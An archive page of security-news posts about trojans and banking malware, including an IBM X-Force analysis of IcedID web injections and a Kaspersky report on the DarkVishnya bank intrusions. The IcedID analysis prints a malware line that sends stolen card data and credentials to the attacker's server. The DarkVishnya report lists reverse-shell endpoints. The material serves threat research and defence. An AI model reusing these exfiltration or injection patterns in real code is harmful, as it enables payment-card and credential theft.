Category Archives: Trojan

Major Android ad fraud scam campaign drains battery & eats data

By Waqas

Presence of infected games and apps that are costing innocent users financial and data losses is not a new phenomenon. However, it is indeed surprising that a firm that promises to fight app piracy is itself involved in this horrendous act.   According to the latest research from Oracle, there is a new ad fraud […]

This is a post from HackRead.com Read the original post: Major Android ad fraud scam campaign drains battery & eats data

Free decryption tool could save victims millions in ransomware payments

A new decryption tool has been released for free on the No More Ransom depository for the latest strand of GandCrab. This tool was developed by the Romanian Police in close collaboration with the internet security company Bitdefender and Europol, together with the support of law enforcement authorities from Austria, Belgium, Cyprus, France, Germany, Italy, the Netherlands, UK, Canada and US FBI. In addition to versions 1, 4 and early versions of 5, the new … More

The post Free decryption tool could save victims millions in ransomware payments appeared first on Help Net Security.

Detecting Trojan attacks against deep neural networks

A group of researchers with CSIRO’s Data61, the digital innovation arm of Australia’s national science agency, have been working on a system for run time detection of trojan attacks on deep neural network models. Although it has yet to be tested in the text and voice domain, their system is highly effective when it comes to spotting trojan attacks on DNN-based computer vision applications. What are deep neural networks? Artificial neural networks (ANNs) are computational … More

The post Detecting Trojan attacks against deep neural networks appeared first on Help Net Security.

Cyber Security Week in Review (Feb. 15, 2019)


Welcome to this week's Cyber Security Week in Review, where Cisco Talos runs down all of the news we think you need to know in the security world. For more news delivered to your inbox every week, sign up for our Threat Source newsletter here.

Top headlines this week


  • Email provider VFEmail says it suffered a “catastrophic” cyber attack. The company warned that about 18 years’ worth of customers’ emails may be permanently gone. “Every file server is lost, every backup server is lost. Strangely, not all VMs shared the same authentication, but all were destroyed. This was more than a multi-password via ssh exploit, and there was no ransom. Just attack and destroy,” VFEmail representatives said in a statement. 
  • Russia is considering isolating itself from the global internet. The Kremlin is experimenting with a new practice of only routing the country’s web requests through the country and not internationally. The country will run a test later this year in an effort to test its cyber defenses.
  • Apple released fixes for multiple security flaws in iOS. Two of the vulnerabilities, which were discovered by Google’s threat research team, were being exploited in the wild. The bugs could allow an attacker to escalate their privileges and eventually completely take over a device. 

From Talos


  • Microsoft released its monthly security update this week, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 69 vulnerabilities, 20 of which are rated “critical,” 46 that are considered “important” and three that are “moderate.” This release also includes a critical security advisory regarding a security update to Adobe Flash Player. 
  • Adobe released security updates for several of its products, including Flash and Acrobat Reader. Cisco Talos specifically discovered a critical remote code execution vulnerability in Adobe Acrobat Reader DC. An attacker could cause a heap overflow by tricking the user into opening a specially crafted PDF, which would allow the attacker to gain code execution privileges. 
  • A new tool from Talos can allow you to study the effect of cyber attacks on oil pump jacks. We released a 3-D printed, small-scale model of a pump jack that can be “hacked” from a smartphone, causing it to eventually overheat. We’ll also be taking this exhibit on the road over the course of the year. 

Malware roundup


  • A new variant of the Astaroth trojan is targeting Brazil via multiple spam campaigns. Once infected, the malware can steal users’ personal information and uses several deobfuscation techniques to make it more difficult to detect. The spam emails are also hitting users in parts of Europe.
  • Credit unions across the U.S. received phishing emails last week targeting anti-money laundering efforts. The phony emails claim to have information on unauthorized wire transfers and ask them to open a PDF that displays the alleged transaction and contains a link to a malicious web page. The attackers used information that’s believed to only be available to the National Credit Union Administration.
  • Google removed a cryptocurrency-stealing malware from its store. The malicious app disguised itself as the legitimate MetaMask service. Once downloaded, it would steal login credentials to steal users’ Ethereum funds. 

The rest of the news


  • Blockchain technology could be useful in detecting deepfake videos, specifically in police body cameras. A new tool called Amber Authenticate runs in the background of cameras to record the hashes of the video, which would appear different a second time if the user had edited the video. All of these results are recorded on the public blockchain.
  • India requested Facebook give its government a backdoor into the WhatsApp messaging app. This would require Facebook to give the government access to users’ encrypted messages that were originally secret.
  • Two U.S. senators are requesting an investigation into foreign VPN services. The senators say the companies could pose a national security risk.  


Astaroth Trojan Exploits Antivirus Software

The Astaroth Trojan steals credentials and other user data through antivirus software, Avast, and services. It sends scam campaigns with

Astaroth Trojan Exploits Antivirus Software on Latest Hacking News.

Trickbot becomes one of the most dangerous pieces of modular malware hitting enterprises

Along with Emotet, Trickbot has become one of the most versatile and dangerous pieces of modular malware hitting enterprise environments. Most recently, its creators have added another dangerous module to it, which allows it to extract and exfiltrate credentials from popular remote access software. Trickbot’s evolution Like Emotet, Trickbot started as a pure banking Trojan but was slowly developed through the years and now has many more additional capabilities. It can: Achieve persistence (through scheduled … More

The post Trickbot becomes one of the most dangerous pieces of modular malware hitting enterprises appeared first on Help Net Security.

Report: Banking Trojans Accounted for More Than Half of All Malicious Payloads in Q4 2018

A new report found that banking Trojans accounted for more than half of all malicious payloads observed in the fourth quarter of 2018.

According to the “Proofpoint Quarterly Threat Report,” this threat dominated the cyber landscape at the end of 2018, constituting 56 percent of all malicious payloads Proofpoint researchers detected.

Several new families helped banking Trojans beat out other categories of malware, including downloaders, credential stealers and remote-access Trojans (RATs), which made up 17 percent, 17 percent and 8 percent of total threats, respectively. Ransomware was barely present in Q4 2018 after spiking and quickly declining in the previous two quarters.

That being said, it’s clear that threat actors preferred to use well-known banking malware over newcomers. For example, Emotet and its botnet-like capabilities accounted for 76 percent of banking Trojan activity in the quarter; taken together, Emotet, Ursnif and Panda Banker (aka Zeus Panda) made up 97 percent of banking Trojan detections for Q4 2018.

More Active and More Sophisticated

Proofpoint’s findings help illustrate how threat actors iterated their banking Trojan use in 2018. Check Point found evidence of this trend when it observed banking Trojans increase their global impact by 50 percent between February and June of last year. In fact, the Dorkbot and Ramnit families made it onto the security firm’s “Top 10 Most Wanted Malware” list for June 2018.

Banking Trojans have also grown in sophistication more generally over the past few years. In April 2017, for instance, Proofpoint observed a large email campaign exploiting a new zero-day vulnerability to deliver the Dridex banking Trojan.

Other banking malware, including QakBot, has added wormlike features that enable it to self-propagate through shared drives and removable media. All the while, many banking Trojans increasingly conduct fileless attacks as a way of evading detection. Cisco Talos observed one such fileless campaign involving Ursnif in January 2019.

How Security Professionals Can Defend Against Banking Trojans

Security professionals can help defend their organizations against banking Trojans by using artificial intelligence technologies to move beyond rule-based security. Organizations should also consider using a unified endpoint management solution that can monitor endpoints for suspicious behavior indicative of malware and automatically uninstall any infected applications.

The post Report: Banking Trojans Accounted for More Than Half of All Malicious Payloads in Q4 2018 appeared first on Security Intelligence.

New Linux Backdoor “SpeakUp” Found Exploiting Flaws In Multiple Linux Distros

Researchers have discovered a new Trojan campaign that creates a Linux backdoor. Referred to as SpeakUp, the backdoor malware exploits

New Linux Backdoor “SpeakUp” Found Exploiting Flaws In Multiple Linux Distros on Latest Hacking News.

Ransomware Sees Further Decline, Banking Trojan Use Steps Up

Ransomware accounted for one tenth of 1% of all malicious email content in Q4, according to a new threat report from Proofpoint. It’s Q4 threat report found that banking trojans accounted

The post Ransomware Sees Further Decline, Banking Trojan Use Steps Up appeared first on The Cyber Security Place.

Geodo Botnets Using New Spam Campaign to Deliver Qakbot Malware

Researchers discovered Geodo botnets using a new spam campaign to deliver samples of Qakbot malware.

Cofense observed the botnets delivering non-Geodo malware since at least Jan. 28 via increasingly targeted phishing efforts. The attack begins when a user receives a phishing email containing a weaponized Microsoft Office document. That file contains malicious embedded macros that, when enabled, directly deliver Qakbot malware to the victim’s device. Researchers also witnessed the campaign leveraging IcedID, another banking Trojan, as its final payload.

In both cases, the campaign ends by replacing the binary content with that of calc.exe. This tactic is designed to help the campaign hide in plain sight, which signals Geodo’s evolution as a digital threat. Cofense found additional evidence of this evolution in Geodo’s use of targeted addressing, internal signatures and previous threads to prey on state-level government departments in the U.S. as part of a related malware campaign.

A Surge in Banking Trojans

This attack campaign comes amid a rise in activity for banking Trojans such as Qakbot and IcedID. Check Point observed a 50 percent increase in banking Trojan activity in the first half of 2018, with Dorkbot and Ramnit earning spots on the company’s “Most Wanted Malware” list for June of that year. Two months later, Ramnit placed even higher on Check Point’s monthly malware index.

Other security companies have also observed this trend among banking Trojans. For example, Kaspersky Lab detected 61,000 installation packages for mobile banking malware in Q2 2018 — more than a threefold growth over the previous quarter.

How to Defend Against Threats Like Qakbot Malware

Security professionals can help defend against digital threats like Qakbot malware by using tools such as VBA editor to analyze Office documents for malicious macros. Organizations should also lead by example and implement two-factor authentication (2FA) to prevent digital attackers from accessing and weaponizing their business email accounts.

The post Geodo Botnets Using New Spam Campaign to Deliver Qakbot Malware appeared first on Security Intelligence.

ExileRAT Malware Targets Tibetan Exile Government

Researchers have discovered a new cyber-espionage campaign targeting the organization representing the exiled Tibetan government.

The post ExileRAT Malware Targets Tibetan Exile Government appeared first on The Security Ledger.

Related Stories

IcedID Operators Using ATSEngine Injection Panel to Hit E-Commerce Sites

As part of the ongoing research into cybercrime tools targeting users of financial services and e-commerce, IBM X-Force analyzes the tactics, techniques and procedures (TTPs) of organized malware gangs, exposing their inner workings to help diffuse reliable threat intelligence to the security community.

In recent analysis of IcedID Trojan attacks, our team looked into how IcedID operators target e-commerce vendors in the U.S., the gang’s typical attack turf. The threat tactic is a two-step injection attack designed to steal access credentials and payment card data from victims. Given that the attack is separately operated, it’s plausible that those behind IcedID are either working on different monetization schemes or renting botnet sections to other criminals, turning it to a cybercrime-as-a-service operation, similar to the Gozi Trojan’s business model.

IcedID Origins

IBM Security discovered and named IcedID in September 2017. This modern banking Trojan features similar modules to malware like TrickBot and Gozi. It typically targets banks, payment card providers, mobile services providers, payroll, webmail and e-commerce sites, and its attack turf is mainly the U.S. and Canada. In their configuration files, it is evident that IcedID’s operators target business accounts in search of heftier bounties than those typically found in consumer accounts.

IcedID has the ability to launch different attack types, including webinjection, redirection and proxy redirection of all victim traffic through a port it listens on.

The malware’s distribution and infection tactics suggest that its operators are not new to the cybercrime arena; it has infected users via the Emotet Trojan since 2017 and in test campaigns launched in mid-2018, also via TrickBot. Emotet has been among the most notable malicious services catering to elite cybercrime groups from Eastern Europe over the past two years. Among its dubious customers are groups that operate QakBot, Dridex, IcedID and TrickBot.

Using ATSEngine to Orchestrate Attacks on E-Commerce Users

While current IcedID configurations feature both webinjection and malware-facilitate redirection attacks, let’s focus on its two-stage webinjection scheme. This tactic differs from similar Trojans, most of which deploy the entire injection either from the configuration or on the fly.

To deploy injections and collect stolen data coming from victim input, some IcedID operators use a commercial inject panel known as Yummba’s ATSEngine. ATS stands for automatic transaction system in this case. A web-based control panel, ATSEngine works from an attack/injection server, not from the malware’s command-and-control (C&C) server. It allows the attacker to orchestrate the injection process, update injections on the attack server with agility and speed, parse stolen data, and manage the operation of fraudulent transactions. Commercial transaction panels are very common and have been in widespread use since they became popular in the days of the Zeus Trojan circa 2007.

Targeting Specific E-Commerce Vendors

In the attack we examined, we realized that some IcedID operators are using the malware to target very specific brands in the e-commerce sphere. Our researchers noted that this attack is likely sectioned off from the main botnet and operated by criminals who specialize in fraudulent merchandise purchases and not necessarily bank fraud.

Let’s look at a sample code from those injections. This particular example was taken from an attack designed to steal credentials and take over the accounts of users browsing to a popular e-commerce site in the U.S.

As a first step, to receive any information from the attack server, the resident malware on the infected device must authenticate itself to the botnet’s operator. It does so using a script from the configuration file. If the bot is authenticated to the server, a malicious script is sent from the attacker’s ATSEngine server, in this case via the URL home_link/gate.php.

Notice that IcedID protects its configured instructions with encryption. The bot therefore requires a private key that authenticates versus the attacker’s web-based control panel (e.g., var pkey = “Ab1cd23”). This means the infected device would not interact with other C&C servers that may belong to other criminals or security researchers.

IBM X-Force Research

Figure 1: IcedID Trojan receives instructions on connecting to attack server (source: IBM Trusteer)

Next, we evaluated the eval(function(p, a, c, k, e, r) function in the communication with the attack server and got the following code to reveal. Encoding is a common strategy to pack code and make it more compact.

IBM X-Force Research

Figure 2: IcedID code designed to set the browser to accept external script injections (source: IBM Trusteer)

This function sets the infected user’s browser to accept external script injections that the Trojan will fetch from its operator’s server during an active attack.

The following snippet shows the creation of a document object model (DOM) script element with type Text/javascript and the ID jsess_script_loader. The injection’s developer used this technique to inject a remote script into a legitimate webpage. It fetches the remote script from the attacker’s C&C and then embeds it in a script tag, either in the head of the original webpage or in its body.

Taking a closer look at the function used here, we can see that it loads the script from the home_link of the ssid= of the infected user’s device, along with the current calendar date.

IBM X-Force Research

Figure 3: IcedID code designed to inject remote script into targeted website (source: IBM Trusteer)

Steps 1 and 2: JavaScript and HTML

To perform the webinjection, an external script, a malicious JavaScript snippet, is charged with injecting HTML code into the infected user’s browser. Using this tactic, the malware does not deploy the entire injection from the configuration file, which would essentially expose it to researchers who successfully decrypt the configuration. Rather, it uses an initial injection as a trigger to fetch a second part of the injection from its attack server in real time. That way, the attack can remain more covert and the attacker can have more agility in updating injections without having to update the configuration file on all the infected devices.

In the example below, the HTML code, named ccgrab, modifies the page the victim is viewing and presents social engineering content to steal payment card data. This extra content on the page prompts the victim to provide additional information about his or her identity to log in securely.

IBM X-Force Research

Figure 4: IcedID tricking victim with webinjection (source: IBM Trusteer)

The malware automatically grabs the victim’s access credentials and the webinjection requests the following additional data elements pertaining to the victim’s payment card:

  • Credit card number;
  • CVV2; and
  • The victim’s state of residence.

Once the victim enters these details, the data is sent to the attacker’s ATSEngine server in parsed form that allows the criminal to view and search data via the control panel.

IBM X-Force Research

Figure 5: Parsed stolen data sent to attacker’s injection server (source: IBM Trusteer)

Managing Data Theft and Storage

The malicious script run by the malware performs additional functions to grab content from the victim’s device and his or her activity. The content grabbing function also checks the validity of the user’s input to ensure that the C&C does not accumulate junk data over time and manages the attack’s variables.

IBM X-Force Research

Figure 6: Malicious IcedID script manages data grabbing (source: IBM Trusteer)

Once the data from the user is validated, it is saved to the C&C:

IBM X-Force Research

Figure 7: Saving stolen data to attack server logs (source: IBM Trusteer)

Injection Attack Server Functions

The attack server enables the attacker to command infected bots by a number of functions. Let’s look at the function list that we examined once we decoded IcedID’s malicious script:

Function name

Purpose

isFrame()

Checks for frames on the website to look for potential third-party security controls.

isValidCardNumber(a)

Validates that payment card numbers are correct. This function is likely based on the Luhn algorithm.

onLoaded()

The main function that sets off the data grabbing process.

addLog(a,b,c,d)

Adds new logs to the reports section in the attack server.

writeLog()

Writes logs to the attack server after validation of the private key and the victim’s service set identifier (SSID). This is achieved by the following script: getData(gate_link + a + “&pkey=” + urlEncode(pkey) + “&ssid=” + b, b)

The attack server enables the operator to use different functions that are sectioned into tabs on the control panel:

  • Accounts page functions — shows the account pages the victim is visiting with the infected user’s credentials.
  • Content variables — includes report generation, account page controls, pushing HTML content into pages the victim is viewing, and a comments module to keep track of activity.
  • Private functions to get HEX and decode.
  • Main page functions.
  • Comments global.
  • Reports global.

Figure 8 below shows the layout of information about functions used on a given infected device as it appears to the attacker using the ATSEngine control panel:

IBM X-Force Research

Figure 8: Attacker’s view from the control panel that manages stolen data (source: IBM Trusteer)

Data Management and Views

The ATSEngine control panel enables the attacker to view the active functions with a time stamp (see Figure 8). The following information is retrieved from the victim’s device and sent to the attack server:

  • Last report time from this infected device;
  • Victim’s IP Address;
  • Victim’s attributed BotID;
  • Victim’s login credentials to the website he or she is visiting;
  • Additional grabbed data from webinjection to the target page, including the victim’s name, payment card type, card number and CVV2, and state of residence; and
  • Comments section inserted by the attacker about the particular victim and his or her accounts.

A view from the control panel displays essential data in tables, providing the attacker with the victim’s login credentials to the targeted site:

IBM X-Force Research

Figure 9: Stolen account information parsed on control panel view (source: IBM Trusteer)

Sectioned IcedID Botnet

Following the analysis of IcedID’s injections and control panel features, our researchers believe that, much like other Trojan-operating gangs, IcedID is possibly renting out its infrastructure to other criminals who specialize in various fraud scenarios.

The control panel, a common element in online fraud operations, reveals the use of a transaction automation tool (ATS) by IcedID’s operators. This commercial panel helps facilitate bot control, data management and management of fraudulent activity. The panel of choice here is a longtime staple in the cybercrime arena called the Yummba/ATSEngine.

Fraud scenarios may vary from one operator to another, but IcedID’s TTPs remain the same and are applied to all the attacks the Trojan facilitates. As such, IcedID’s webinjections can apply to any website, and its redirection schemes can be fitted to any target.

Sharpened Focus in 2019

While some Trojan gangs choose to expand their attack turf into more countries, this requires funding, resources to build adapted attack tools, alliances with local organized crime and additional money laundering operations. In IcedID’s case, it does not appear the gang is looking to expand. Ever since it first appeared in the wild, IcedID has kept its focus on North America by targeting banks and e-commerce businesses in that region.

In 2018, IcedID reached the fourth rank on the global financial Trojan chart, having kept up its malicious activity throughout the year.

IBM X-Force Research

Figure 10: Top 10 financial Trojan gangs in 2018 (source: IBM Trusteer)

In 2019, our team expects to see this trend continue. To keep up on threats like IcedID, read more threat research from the X-Force team and join X-Force Exchange, where we publish indicators of compromise (IoCs) and other valuable intelligence for security professionals.

The post IcedID Operators Using ATSEngine Injection Panel to Hit E-Commerce Sites appeared first on Security Intelligence.

Attack Campaign Targets Linux Servers to Install New SpeakUp Trojan

Security researchers observed an attack campaign that is targeting Linux servers to install samples of SpeakUp, a new backdoor Trojan.

According to Check Point Research, the campaign is currently targeting servers in East Asia and Latin America. The attack begins with the exploitation of CVE-2018-20062, a reported vulnerability affecting ThinkPHP. The campaign then uses command injection techniques to upload a PHP shell, which is responsible for delivering and executing the SpeakUp Trojan as a Perl backdoor.

Upon execution, SpeakUp continuously communicates with its command and control (C&C) server to receive a variety of instructions. It can use the newtask command to execute arbitrary code or execute a file from a remote server, for example. This ability enables SpeakUp to deliver additional backdoors, each of which comes equipped with a Python script designed to scan and infect more Linux servers within its internal and external subnets.

Furthermore, the Trojan can leverage the newconfig command to update the configuration file for XMRig, a cryptocurrency miner that it serves to listening infected servers.

Linux Servers Under Attack

SpeakUp isn’t the only malware targeting Linux servers. On the contrary, these IT assets are under attack from a range of malicious software.

In December 2018, Slovakian security firm ESET identified 21 Linux malware families that serve as OpenSSH backdoors. Around the same time, Anomali Labs unveiled its discovery of Linux Rabbit and Rabbot, two malware families served by a campaign targeting Linux servers in Russia, South Korea, the U.K. and the U.S. that are both capable of installing crypto-miners.

Also in December, Bleeping Computer learned of a new campaign that had leveraged unsecured Intelligent Platform Management Interface (IPMI) cards to infect Linux servers with JungleSec ransomware.

How to Defend Against the SpeakUp Trojan

Security professionals can help defend against malware like SpeakUp by utilizing a unified endpoint management (UEM) tool to monitor assets such as Linux servers for malicious activity. Experts also recommend practicing timely patch management to defend endpoints against cryptocurrency miners, and investing in education and role-based training to help cultivate a security-aware workforce.

The post Attack Campaign Targets Linux Servers to Install New SpeakUp Trojan appeared first on Security Intelligence.

Emotet: A veritable Swiss Army knife of malicious capabilities

Formerly just a banking Trojan, Emotet is now one of the most dangerous and multifaceted malware out there. According to Malwarebytes, it and Trickbot are part of the reason why Trojans topped their list of most common business detections in 2018. Emotet’s capabilities Emotet’s initial incarnation dates back to 2014 but, in the intervening years, it has become a veritable Swiss Army knife of malicious capabilities. It can: Download additional malware (often Trickbot) Collect information … More

The post Emotet: A veritable Swiss Army knife of malicious capabilities appeared first on Help Net Security.

Razy Trojan Installs Malicious Browser Extensions to Steal Cryptocurrency

Security researchers observed the Razy Trojan installing malicious extensions across multiple web browsers to steal cryptocurrency.

In 2018, Kaspersky Lab noticed that the Trojan was being distributed via advertising blocks on websites and free file hosting services disguised as legitimate software. The malware uses different infection processes for Google Chrome, Mozilla Firefox and Yandex Browser, disabling automatic updates and integrity checks for installed extensions.

Razy then uses its main.js script to steal cryptocurrency by searching websites for the addresses of digital wallets. If it finds what it’s looking for, the Trojan replaces the wallet addresses with those controlled by the malware’s operators.

Razy can also spoof images of QR codes that point to cryptocurrency wallets, modify digital currency exchanges’ webpages by displaying messages that lure users with the promise of new features, and alter Google or Yandex search results to trick victims into visiting infected websites.

Not the First Cryptocurrency Stealer — And Likely Not the Last

The Razy Trojan isn’t the first malware known for stealing users’ cryptocurrency. In July 2018, for example, Fortinet came across a malware sample that modified victims’ clipboard content to replace a copied bitcoin address with one belonging to threat actors. Just a few months later, researchers at enSilo discovered DarkGate, malware that is capable of crypto-mining and ransomware-like behavior in addition to stealing virtual currency from victims’ wallets.

These malware samples played a part in the rise of cryptocurrency theft last year. In just the first six months of 2018, Carbon Black observed that digital currency theft reached $1.1 billion. One of the incidents that took place within that time period involved the theft of $530 million, as reported by CNN.

How to Defend Against Malware Like Razy

Security professionals can help defend against threats like Razy by incorporating artificial intelligence (AI) into their organizations’ malware defense strategies, including the use of AI in detectors and cyber deception to misdirect and deactivate AI-powered attacks. Experts also recommend using blockchain and other advanced technologies to protect against cryptocurrency threats.

The post Razy Trojan Installs Malicious Browser Extensions to Steal Cryptocurrency appeared first on Security Intelligence.

Beware; hackers are using malicious TeamViewer tool to spread malware

By Waqas

TeamViewer is a popular remote control desktop sharing software with more than 1 billion users and that makes it a lucrative target for cyber criminals. Recently, the IT security researchers at Trend Micro have uncovered a malware campaign targeting unsuspecting users with a malicious version of TeamViewer. Note: It is worth mentioning that the official website […]

This is a post from HackRead.com Read the original post: Beware; hackers are using malicious TeamViewer tool to spread malware

Banking trojan Gozi resurfaces with new tactics

Twelve-year-old trojan malware, Gozi, has resurfaced with new techniques to steal users’ financial credentials. Using common strategies such as keylogging,

Banking trojan Gozi resurfaces with new tactics on Latest Hacking News.

Security Affairs: A still ongoing spam campaign that has been active during the last months has be…

A still ongoing spam campaign that has been active during the last months has been distributing the Redaman banking malware.

Experts at Palo Alto Networks continue to monitor an ongoing spam campaign that has been distributing the Redaman banking malware.

The malware was first observed in the threat landscape in 2015, most of the victims were customers of Russian financial institutions. The malicious code was initially reported as the RTM banking Trojan, both Symantec and Microsoft detected Redaman in 2017 and classified it as a variant of RTM.

Between September and December 2018 the experts observed a variant of the Redaman banking malware that was in Russian language and that was distributed via spam campaigns. 

Threat actors target Russian email recipients (email addresses ending in .ru) with messages using archived Windows executable files disguised as a PDF document.

“Since September of 2018, Redaman banking malware has been distributed through malspam. In this campaign, the Russian language malspam is addressed to Russian email recipients, often with email addresses ending in .ru.” reads the analysis published by Palo Alto Networks.

“These emails have file attachments. These file attachments are archived Windows executable files disguised as a PDF document.”

redaman infection chain

In the last campaign, Palo Alto Networks detected 3,845 email sessions with Redaman attachment.

The top 5 senders were Russia (3,456 sessions), Belarus (98), Ukraine (93), Estonia (29), and Germany (30), while the top 5 recipients were Russia (2,894), Netherlands (195), United States (55), Sweden (24), and Japan (16).

When Windows executable first run, the Redamhe checks for a series of files and directories that could indicate that the malware is running in a sandbox or a virtualized environment. It throws an exception and exits if any of those files are found.

When proceeds, the executable drops a DLL file in the AppData\Local\Temp\ directory and creates a folder under C:\ProgramData\, then moves the DLL there.

The malware achieves persistence using a scheduled Windows task that allows the execution of the DLL at user logon.

“After creating a scheduled task and causing the DLL to load, the initial Redaman executable file deletes itself. ” continues the analysis. 

Redaman uses an application-defined hook procedure to monitor browser activity, specifically Chrome, Firefox, and Internet Explorer. It then searches the local host for information related to the financial sector.”

The Redaman the activity of the most popular browsers (Chrome, Firefox, and Internet Explorer), it is able to download files, log keystrokes, capture screenshots and record video of the desktop, collect and exfiltrate financial data, monitor smart cards, shut down the infected host, modify DNS configuration, steal clipboard data, terminate running processes, and add certificates to the Windows store.

“Since it was first noted in 2015, this family of banking malware continues targeting recipients who conduct transactions with Russian financial institutions.” Palo Alto Networks concludes. 

“We found over 100 examples of malspam during the last four months of 2018. We expect to discover new Redaman samples as 2019 progresses,”

Pierluigi Paganini

(SecurityAffairs – Redaman banking Trojan, spam)

The post appeared first on Security Affairs.



Security Affairs

New Russian Language Malspam is delivering Redaman Banking Malware

A still ongoing spam campaign that has been active during the last months has been distributing the Redaman banking malware.

Experts at Palo Alto Networks continue to monitor an ongoing spam campaign that has been distributing the Redaman banking malware.

The malware was first observed in the threat landscape in 2015, most of the victims were customers of Russian financial institutions. The malicious code was initially reported as the RTM banking Trojan, both Symantec and Microsoft detected Redaman in 2017 and classified it as a variant of RTM.

Between September and December 2018 the experts observed a variant of the Redaman banking malware that was in Russian language and that was distributed via spam campaigns. 

Threat actors target Russian email recipients (email addresses ending in .ru) with messages using archived Windows executable files disguised as a PDF document.

“Since September of 2018, Redaman banking malware has been distributed through malspam. In this campaign, the Russian language malspam is addressed to Russian email recipients, often with email addresses ending in .ru.” reads the analysis published by Palo Alto Networks.

“These emails have file attachments. These file attachments are archived Windows executable files disguised as a PDF document.”

redaman infection chain

In the last campaign, Palo Alto Networks detected 3,845 email sessions with Redaman attachment.

The top 5 senders were Russia (3,456 sessions), Belarus (98), Ukraine (93), Estonia (29), and Germany (30), while the top 5 recipients were Russia (2,894), Netherlands (195), United States (55), Sweden (24), and Japan (16).

When Windows executable first run, the Redamhe checks for a series of files and directories that could indicate that the malware is running in a sandbox or a virtualized environment. It throws an exception and exits if any of those files are found.

When proceeds, the executable drops a DLL file in the AppData\Local\Temp\ directory and creates a folder under C:\ProgramData\, then moves the DLL there.

The malware achieves persistence using a scheduled Windows task that allows the execution of the DLL at user logon.

“After creating a scheduled task and causing the DLL to load, the initial Redaman executable file deletes itself. ” continues the analysis. 

Redaman uses an application-defined hook procedure to monitor browser activity, specifically Chrome, Firefox, and Internet Explorer. It then searches the local host for information related to the financial sector.”

The Redaman the activity of the most popular browsers (Chrome, Firefox, and Internet Explorer), it is able to download files, log keystrokes, capture screenshots and record video of the desktop, collect and exfiltrate financial data, monitor smart cards, shut down the infected host, modify DNS configuration, steal clipboard data, terminate running processes, and add certificates to the Windows store.

“Since it was first noted in 2015, this family of banking malware continues targeting recipients who conduct transactions with Russian financial institutions.” Palo Alto Networks concludes. 

“We found over 100 examples of malspam during the last four months of 2018. We expect to discover new Redaman samples as 2019 progresses,”

Pierluigi Paganini

(SecurityAffairs – Redaman banking Trojan, spam)

The post New Russian Language Malspam is delivering Redaman Banking Malware appeared first on Security Affairs.

Malicious apps deploy Anubis banking trojan using motion detection

By Waqas

Google has left no stone unturned in preventing malware and banking trojan from invading the applications uploaded on its official Play Store. Despite having anti-malware protection, shady applications somehow make it to the platform. In fact, malware developers have become so advanced in their skills and tactics that they are now using motion detection technology […]

This is a post from HackRead.com Read the original post: Malicious apps deploy Anubis banking trojan using motion detection

NanoCore Trojan Malware Cannot be Killed By Users

Most people are now familiar with how destructive and damaging computer viruses such as a Trojan can be. Many are

NanoCore Trojan Malware Cannot be Killed By Users on Latest Hacking News.

DarkVishnya: Banks attacked through direct connection to local network

While novice attackers, imitating the protagonists of the U.S. drama Mr. Robot, leave USB flash drives lying around parking lots in the hope that an employee from the target company picks one up and plugs it in at the workplace, more experienced cybercriminals prefer not to rely on chance. In 2017-2018, Kaspersky Lab specialists were invited to research a series of cybertheft incidents. Each attack had a common springboard: an unknown device directly connected to the company’s local network. In some cases, it was the central office, in others a regional office, sometimes located in another country. At least eight banks in Eastern Europe were the targets of the attacks (collectively nicknamed DarkVishnya), which caused damage estimated in the tens of millions of dollars.

Each attack can be divided into several identical stages. At the first stage, a cybercriminal entered the organization’s building under the guise of a courier, job seeker, etc., and connected a device to the local network, for example, in one of the meeting rooms. Where possible, the device was hidden or blended into the surroundings, so as not to arouse suspicion.

High-tech tables with sockets are great for planting hidden devices

High-tech tables with sockets are great for planting hidden devices

The devices used in the DarkVishnya attacks varied in accordance with the cybercriminals’ abilities and personal preferences. In the cases we researched, it was one of three tools:

  • netbook or inexpensive laptop
  • Raspberry Pi computer
  • Bash Bunny, a special tool for carrying out USB attacks

Inside the local network, the device appeared as an unknown computer, an external flash drive, or even a keyboard. Combined with the fact that Bash Bunny is comparable in size to a USB flash drive, this seriously complicated the search for the entry point. Remote access to the planted device was via a built-in or USB-connected GPRS/3G/LTE modem.

At the second stage, the attackers remotely connected to the device and scanned the local network seeking to gain access to public shared folders, web servers, and any other open resources. The aim was to harvest information about the network, above all, servers and workstations used for making payments. At the same time, the attackers tried to brute-force or sniff login data for such machines. To overcome the firewall restrictions, they planted shellcodes with local TCP servers. If the firewall blocked access from one segment of the network to another, but allowed a reverse connection, the attackers used a different payload to build tunnels.

Having succeeded, the cybercriminals proceeded to stage three. Here they logged into the target system and used remote access software to retain access. Next, malicious services created using msfvenom were started on the compromised computer. Because the hackers used fileless attacks and PowerShell, they were able to avoid whitelisting technologies and domain policies. If they encountered a whitelisting that could not be bypassed, or PowerShell was blocked on the target computer, the cybercriminals used impacket, and winexesvc.exe or psexec.exe to run executable files remotely.

Verdicts

not-a-virus.RemoteAdmin.Win32.DameWare
MEM:Trojan.Win32.Cometer
MEM:Trojan.Win32.Metasploit
Trojan.Multi.GenAutorunReg
HEUR:Trojan.Multi.Powecod
HEUR:Trojan.Win32.Betabanker.gen
not-a-virus:RemoteAdmin.Win64.WinExe
Trojan.Win32.Powershell
PDM:Trojan.Win32.CmdServ
Trojan.Win32.Agent.smbe
HEUR:Trojan.Multi.Powesta.b
HEUR:Trojan.Multi.Runner.j
not-a-virus.RemoteAdmin.Win32.PsExec

Shellcode listeners

tcp://0.0.0.0:5190
tcp://0.0.0.0:7900

Shellcode connects

tcp://10.**.*.***:4444
tcp://10.**.*.**:4445
tcp://10.**.*.**:31337

Shellcode pipes

\\.\xport
\\.\s-pipe

A Deep Dive Into RIG Exploit Kit Delivering Grobios Trojan

As discussed in previous blogs, exploit kit activity has been on the decline since the latter half of 2016. However, we do still periodically observe significant developments in this space, and we have been observing interesting ongoing activity involving RIG Exploit Kit (EK). Although the volume of its traffic observed in-the-wild has been on the decline, RIG EK remains active, with a wide range of associated crimeware payloads.

In this recent finding, RIG EK was observed delivering a Trojan named Grobios. This blog post will discuss this Trojan in depth with a focus on its evasion and anti-sandbox techniques, but first let’s take a quick look at the attack flow. Figure 1 shows the entire infection chain for the activity we observed.


Figure 1: Infection chain

We first observed redirects to RIG EK on Mar. 10, 2018, from the compromised domain, latorre[.]com[.]au, which had a malicious iframe injected to it (Figure 2).


Figure 2: Malicious Iframe injected in latorre[.]com

The iframe loads a malvertisement domain, which communicates over SSL (certificate shown in Figure 3) and leads to the RIG EK landing page that loads the malicious Flash file (Figure 4).


Figure 3: Malicious SSL flow


Figure 4: RIG EK SWF download request

